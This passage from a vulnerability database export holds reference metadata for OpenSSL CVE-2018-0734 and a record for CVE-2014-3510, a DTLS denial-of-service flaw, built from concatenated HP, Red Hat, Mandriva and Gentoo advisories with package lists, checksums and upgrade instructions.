"https://access.redhat.com/security/cve/cve-2019-0217" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-0217" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2019-0197" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2018-17189" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9516" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2018-5407" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2019-0196" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-0196" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/327.html" }, { "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2018-0734" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://tools.cisco.com/security/center/viewalert.x?alertid=59087" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-0734" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5407" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-0732" }, { "trust": 0.1, "url": "https://security-tracker.debian.org/tracker/openssl" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#low" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-1543" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.1_release_notes/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-0735" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-1543" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.1.1-1ubuntu2.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu4.14" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.27" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.1.0g-2ubuntu4.3" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/usn/usn-3840-1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl1.0/1.0.2n-1ubuntu6.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl1.0/1.0.2n-1ubuntu5.2" }, { "trust": 0.1, "url": "https://www.openssl.org/policies/secpolicy.html" } ], "sources": [ { "db": "VULHUB", "id": "VHN-118936" }, { "db": "VULMON", "id": "CVE-2018-0734" }, { "db": "PACKETSTORM", "id": "150437" }, { "db": "PACKETSTORM", "id": "155414" }, { "db": "PACKETSTORM", "id": "155417" }, { "db": "PACKETSTORM", "id": "150561" }, { "db": "PACKETSTORM", "id": "155160" }, { "db": "PACKETSTORM", "id": "150683" }, { "db": "PACKETSTORM", "id": "169667" }, { "db": "CNNVD", "id": "CNNVD-201810-1435" }, { "db": "NVD", "id": "CVE-2018-0734" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-118936" }, { "db": "VULMON", "id": "CVE-2018-0734" }, { "db": "PACKETSTORM", "id": "150437" }, { "db": "PACKETSTORM", "id": "155414" }, { "db": "PACKETSTORM", "id": "155417" }, { "db": "PACKETSTORM", "id": "150561" }, { "db": "PACKETSTORM", "id": "155160" }, { "db": "PACKETSTORM", "id": "150683" }, { "db": "PACKETSTORM", "id": "169667" }, { "db": "CNNVD", "id": "CNNVD-201810-1435" }, { "db": "NVD", "id": "CVE-2018-0734" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-10-30T00:00:00", "db": "VULHUB", "id": "VHN-118936" }, { "date": "2018-10-30T00:00:00", "db": "VULMON", "id": "CVE-2018-0734" }, { "date": "2018-11-22T23:23:23", "db": "PACKETSTORM", "id": "150437" }, { "date": "2019-11-20T23:02:22", "db": "PACKETSTORM", "id": "155414" }, { "date": "2019-11-20T21:11:11", "db": "PACKETSTORM", "id": "155417" }, { "date": "2018-12-03T21:06:37", "db": "PACKETSTORM", "id": "150561" }, { "date": "2019-11-06T15:56:37", "db": "PACKETSTORM", "id": "155160" }, { "date": "2018-12-07T01:03:36", "db": "PACKETSTORM", "id": "150683" }, { "date": "2018-10-30T12:12:12", "db": "PACKETSTORM", "id": "169667" }, { "date": "2018-10-31T00:00:00", "db": "CNNVD", "id": "CNNVD-201810-1435" }, { "date": "2018-10-30T12:29:00.257000", "db": "NVD", "id": "CVE-2018-0734" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-08-24T00:00:00", "db": "VULHUB", "id": "VHN-118936" }, { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2018-0734" }, { "date": "2022-02-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201810-1435" }, { "date": "2023-11-07T02:51:05.217000", "db": "NVD", "id": "CVE-2018-0734" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201810-1435" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL Encryption problem vulnerability", "sources": [ { "db": "CNNVD", "id": "CNNVD-201810-1435" } ], "trust": 0.6 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "encryption problem", "sources": [ { "db": "CNNVD", "id": "CNNVD-201810-1435" } ], "trust": 0.6 } }
var-201408-0092
Vulnerability from variot
The ssl3_send_client_key_exchange function in s3_clnt.c in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote DTLS servers to cause a denial of service (NULL pointer dereference and client application crash) via a crafted handshake message in conjunction with a (1) anonymous DH or (2) anonymous ECDH ciphersuite. OpenSSL is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application, denying service to legitimate users. OpenSSL prior to 0.9.8zb, 1.0.0n, and 1.0.1i are vulnerable. - The SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" also known as "Poodle", which could be exploited remotely resulting in disclosure of information. Alternatively, you may reboot your system.
For the testing distribution (jessie), these problems will be fixed soon. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04426586
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04426586 Version: 1
HPSBOV03099 rev.1 - HP OpenVMS running OpenSSL, Remote Denial of Service (DoS) or Disclosure of Information
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2014-09-12 Last Updated: 2014-09-12
Potential Security Impact: Remote Denial of Service (DoS), disclosure of information
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP OpenVMS running OpenSSL.
References:
CVE-2014-3505 - Remote Denial of Service (DoS) CVE-2014-3506 - Remote Denial of Service (DoS) CVE-2014-3507 - Remote Denial of Service (DoS) CVE-2014-3508 - Remote Disclosure of Information CVE-2014-3510 - Remote Denial of Service (DoS)
SSRT101686
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP SSL Version 1.4-476 and earlier for OpenVMS
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2014-3505 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3506 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3507 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3508 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2014-3510 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following software update available to resolve the vulnerabilities with HP OpenVMS running OpenSSL.
HP SSL Version 1.4-493 for OpenVMS is available from the following
location:
http://h71000.www7.hp.com/openvms/products/ssl/ssl.html
HISTORY Version:1 (rev.1) - 12 September 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: openssl security update Advisory ID: RHSA-2014:1052-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1052.html Issue date: 2014-08-13 CVE Names: CVE-2014-3505 CVE-2014-3506 CVE-2014-3507 CVE-2014-3508 CVE-2014-3509 CVE-2014-3510 CVE-2014-3511 =====================================================================
- Summary:
Updated openssl packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6 and 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL), Transport Layer Security (TLS), and Datagram Transport Layer Security (DTLS) protocols, as well as a full-strength, general purpose cryptography library.
A race condition was found in the way OpenSSL handled ServerHello messages with an included Supported EC Point Format extension. A malicious server could possibly use this flaw to cause a multi-threaded TLS/SSL client using OpenSSL to write into freed memory, causing the client to crash or execute arbitrary code. (CVE-2014-3509)
It was discovered that the OBJ_obj2txt() function could fail to properly NUL-terminate its output. This could possibly cause an application using OpenSSL functions to format fields of X.509 certificates to disclose portions of its memory. (CVE-2014-3508)
A flaw was found in the way OpenSSL handled fragmented handshake packets. A man-in-the-middle attacker could use this flaw to force a TLS/SSL server using OpenSSL to use TLS 1.0, even if both the client and the server supported newer protocol versions. (CVE-2014-3511)
Multiple flaws were discovered in the way OpenSSL handled DTLS packets. A remote attacker could use these flaws to cause a DTLS server or client using OpenSSL to crash or use excessive amounts of memory. (CVE-2014-3510)
All OpenSSL users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1127490 - CVE-2014-3508 openssl: information leak in pretty printing functions 1127498 - CVE-2014-3509 openssl: race condition in ssl_parse_serverhello_tlsext 1127499 - CVE-2014-3505 openssl: DTLS packet processing double free 1127500 - CVE-2014-3506 openssl: DTLS memory exhaustion 1127502 - CVE-2014-3507 openssl: DTLS memory leak from zero-length fragments 1127503 - CVE-2014-3510 openssl: DTLS anonymous (EC)DH denial of service 1127504 - CVE-2014-3511 openssl: TLS protocol downgrade attack
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: openssl-1.0.1e-16.el6_5.15.src.rpm
i386: openssl-1.0.1e-16.el6_5.15.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm
x86_64: openssl-1.0.1e-16.el6_5.15.i686.rpm openssl-1.0.1e-16.el6_5.15.x86_64.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source: openssl-1.0.1e-16.el6_5.15.src.rpm
i386: openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-devel-1.0.1e-16.el6_5.15.i686.rpm openssl-perl-1.0.1e-16.el6_5.15.i686.rpm openssl-static-1.0.1e-16.el6_5.15.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm openssl-devel-1.0.1e-16.el6_5.15.i686.rpm openssl-devel-1.0.1e-16.el6_5.15.x86_64.rpm openssl-perl-1.0.1e-16.el6_5.15.x86_64.rpm openssl-static-1.0.1e-16.el6_5.15.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: openssl-1.0.1e-16.el6_5.15.src.rpm
x86_64: openssl-1.0.1e-16.el6_5.15.i686.rpm openssl-1.0.1e-16.el6_5.15.x86_64.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source: openssl-1.0.1e-16.el6_5.15.src.rpm
x86_64: openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm openssl-devel-1.0.1e-16.el6_5.15.i686.rpm openssl-devel-1.0.1e-16.el6_5.15.x86_64.rpm openssl-perl-1.0.1e-16.el6_5.15.x86_64.rpm openssl-static-1.0.1e-16.el6_5.15.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: openssl-1.0.1e-16.el6_5.15.src.rpm
i386: openssl-1.0.1e-16.el6_5.15.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-devel-1.0.1e-16.el6_5.15.i686.rpm
ppc64: openssl-1.0.1e-16.el6_5.15.ppc.rpm openssl-1.0.1e-16.el6_5.15.ppc64.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.ppc.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.ppc64.rpm openssl-devel-1.0.1e-16.el6_5.15.ppc.rpm openssl-devel-1.0.1e-16.el6_5.15.ppc64.rpm
s390x: openssl-1.0.1e-16.el6_5.15.s390.rpm openssl-1.0.1e-16.el6_5.15.s390x.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.s390.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.s390x.rpm openssl-devel-1.0.1e-16.el6_5.15.s390.rpm openssl-devel-1.0.1e-16.el6_5.15.s390x.rpm
x86_64: openssl-1.0.1e-16.el6_5.15.i686.rpm openssl-1.0.1e-16.el6_5.15.x86_64.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm openssl-devel-1.0.1e-16.el6_5.15.i686.rpm openssl-devel-1.0.1e-16.el6_5.15.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source: openssl-1.0.1e-16.el6_5.15.src.rpm
i386: openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-perl-1.0.1e-16.el6_5.15.i686.rpm openssl-static-1.0.1e-16.el6_5.15.i686.rpm
ppc64: openssl-debuginfo-1.0.1e-16.el6_5.15.ppc64.rpm openssl-perl-1.0.1e-16.el6_5.15.ppc64.rpm openssl-static-1.0.1e-16.el6_5.15.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-16.el6_5.15.s390x.rpm openssl-perl-1.0.1e-16.el6_5.15.s390x.rpm openssl-static-1.0.1e-16.el6_5.15.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm openssl-perl-1.0.1e-16.el6_5.15.x86_64.rpm openssl-static-1.0.1e-16.el6_5.15.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: openssl-1.0.1e-16.el6_5.15.src.rpm
i386: openssl-1.0.1e-16.el6_5.15.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-devel-1.0.1e-16.el6_5.15.i686.rpm
x86_64: openssl-1.0.1e-16.el6_5.15.i686.rpm openssl-1.0.1e-16.el6_5.15.x86_64.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm openssl-devel-1.0.1e-16.el6_5.15.i686.rpm openssl-devel-1.0.1e-16.el6_5.15.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source: openssl-1.0.1e-16.el6_5.15.src.rpm
i386: openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-perl-1.0.1e-16.el6_5.15.i686.rpm openssl-static-1.0.1e-16.el6_5.15.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm openssl-perl-1.0.1e-16.el6_5.15.x86_64.rpm openssl-static-1.0.1e-16.el6_5.15.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: openssl-1.0.1e-34.el7_0.4.src.rpm
x86_64: openssl-1.0.1e-34.el7_0.4.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.4.i686.rpm openssl-libs-1.0.1e-34.el7_0.4.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.4.i686.rpm openssl-devel-1.0.1e-34.el7_0.4.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.4.x86_64.rpm openssl-static-1.0.1e-34.el7_0.4.i686.rpm openssl-static-1.0.1e-34.el7_0.4.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl-1.0.1e-34.el7_0.4.src.rpm
x86_64: openssl-1.0.1e-34.el7_0.4.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.4.i686.rpm openssl-libs-1.0.1e-34.el7_0.4.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.4.i686.rpm openssl-devel-1.0.1e-34.el7_0.4.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.4.x86_64.rpm openssl-static-1.0.1e-34.el7_0.4.i686.rpm openssl-static-1.0.1e-34.el7_0.4.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl-1.0.1e-34.el7_0.4.src.rpm
ppc64: openssl-1.0.1e-34.el7_0.4.ppc64.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.ppc.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.ppc64.rpm openssl-devel-1.0.1e-34.el7_0.4.ppc.rpm openssl-devel-1.0.1e-34.el7_0.4.ppc64.rpm openssl-libs-1.0.1e-34.el7_0.4.ppc.rpm openssl-libs-1.0.1e-34.el7_0.4.ppc64.rpm
s390x: openssl-1.0.1e-34.el7_0.4.s390x.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.s390.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.s390x.rpm openssl-devel-1.0.1e-34.el7_0.4.s390.rpm openssl-devel-1.0.1e-34.el7_0.4.s390x.rpm openssl-libs-1.0.1e-34.el7_0.4.s390.rpm openssl-libs-1.0.1e-34.el7_0.4.s390x.rpm
x86_64: openssl-1.0.1e-34.el7_0.4.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.4.i686.rpm openssl-devel-1.0.1e-34.el7_0.4.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.4.i686.rpm openssl-libs-1.0.1e-34.el7_0.4.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssl-debuginfo-1.0.1e-34.el7_0.4.ppc.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.ppc64.rpm openssl-perl-1.0.1e-34.el7_0.4.ppc64.rpm openssl-static-1.0.1e-34.el7_0.4.ppc.rpm openssl-static-1.0.1e-34.el7_0.4.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-34.el7_0.4.s390.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.s390x.rpm openssl-perl-1.0.1e-34.el7_0.4.s390x.rpm openssl-static-1.0.1e-34.el7_0.4.s390.rpm openssl-static-1.0.1e-34.el7_0.4.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.4.x86_64.rpm openssl-static-1.0.1e-34.el7_0.4.i686.rpm openssl-static-1.0.1e-34.el7_0.4.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl-1.0.1e-34.el7_0.4.src.rpm
x86_64: openssl-1.0.1e-34.el7_0.4.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.4.i686.rpm openssl-devel-1.0.1e-34.el7_0.4.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.4.i686.rpm openssl-libs-1.0.1e-34.el7_0.4.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.4.x86_64.rpm openssl-static-1.0.1e-34.el7_0.4.i686.rpm openssl-static-1.0.1e-34.el7_0.4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2014-3505.html https://www.redhat.com/security/data/cve/CVE-2014-3506.html https://www.redhat.com/security/data/cve/CVE-2014-3507.html https://www.redhat.com/security/data/cve/CVE-2014-3508.html https://www.redhat.com/security/data/cve/CVE-2014-3509.html https://www.redhat.com/security/data/cve/CVE-2014-3510.html https://www.redhat.com/security/data/cve/CVE-2014-3511.html https://access.redhat.com/security/updates/classification/#moderate https://www.openssl.org/news/secadv_20140806.txt
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFT69raXlSAg2UNWIIRAiQAAKCbp6Iou4mHuootBfgs0jm7zP/wWACgt50C pHXxupQnHYYH+zJFOmk5u8o= =DwUW -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
The updated packages have been upgraded to the 1.0.0n version where these security flaws has been fixed.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3508 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3509 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3505 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3506 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3507 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3510 http://www.openssl.org/news/secadv_20140806.txt
Updated Packages:
Mandriva Business Server 1/X86_64: 17007f558e739eb863c8507d520ffbc9 mbs1/x86_64/lib64openssl1.0.0-1.0.0n-1.mbs1.x86_64.rpm f810bbe20b2de26cb99d13ddaf0ac2fa mbs1/x86_64/lib64openssl-devel-1.0.0n-1.mbs1.x86_64.rpm 54d87a61ca0440dc5f344931de1ff43e mbs1/x86_64/lib64openssl-engines1.0.0-1.0.0n-1.mbs1.x86_64.rpm 5b1748370e5a855cc31d3eec7673da5e mbs1/x86_64/lib64openssl-static-devel-1.0.0n-1.mbs1.x86_64.rpm 7e19a555629b4a2d3d4533be7786ce5e mbs1/x86_64/openssl-1.0.0n-1.mbs1.x86_64.rpm a9e74f2bab2878f601cfb44620c76dbb mbs1/SRPMS/openssl-1.0.0n-1.mbs1.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
iD8DBQFT5HsDmqjQ0CJFipgRAhA5AJ0ZoDe2+SA7K7xk+NZLedQBVoFVvgCffPW9 5geoq7aMnxbnw5eTuuH+iIs= =CK7e -----END PGP SIGNATURE----- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201412-39
http://security.gentoo.org/
Severity: Normal Title: OpenSSL: Multiple vulnerabilities Date: December 26, 2014 Bugs: #494816, #519264, #525468 ID: 201412-39
Synopsis
Multiple vulnerabilities have been found in OpenSSL, the worst of which could result in Denial of Service or Man-in-the-Middle attacks. Please review the CVE identifiers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All OpenSSL 1.0.1 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.1j"
All OpenSSL 0.9.8 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-0.9.8z_p2"
Packages which depend on this library may need to be recompiled. Tools such as revdep-rebuild may assist in identifying these packages.
References
